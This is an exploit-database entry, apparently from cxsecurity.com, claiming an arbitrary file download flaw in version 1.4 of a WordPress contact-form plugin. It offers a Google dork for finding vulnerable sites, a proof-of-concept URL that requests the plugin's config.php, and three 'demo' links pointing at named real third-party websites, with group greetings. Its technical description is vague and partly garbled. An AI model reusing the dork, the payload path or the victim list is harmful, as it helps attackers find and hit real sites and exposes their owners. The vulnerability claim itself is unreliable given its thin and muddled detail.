Wordpress Plugin N-Media 1.4 Arbitrary File Download Vulnerability

2016.11.19
ir Iranonymous (IR) ir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:index of website-contact-form-with-file-upload config.php

########################## # Exploit Title: Wordpress Plugin N-Media 1.4 Arbitrary File Download Vulnerability # Google Dork : intext:index of website-contact-form-with-file-upload config.php # Date: 10/11/2016 # Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload config.php 1.4.zip # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: turk.Khan # Tested on : Windows7 # Version: 1.4 ########################## # Info : The "File Download" (ajax) function is affected Arbitrary File Download Vulnerability # Poc : http://www.site.com//wp-content/plugins/website-contact-form-with-file-upload/config.php ############################### # Demo : http://immobilierelotfi.com/wp-content/plugins/website-contact-form-with-file-upload/config.php http://www.inbalancehealthcorp.com/wp-content/plugins/website-contact-form-with-file-upload/config.php http://mijuprint.com/new/wp-content/plugins/website-contact-form-with-file-upload/config.php ############################# #Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr || And All Of Iranian Anonymous . # Discovered By: turk.Khan


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top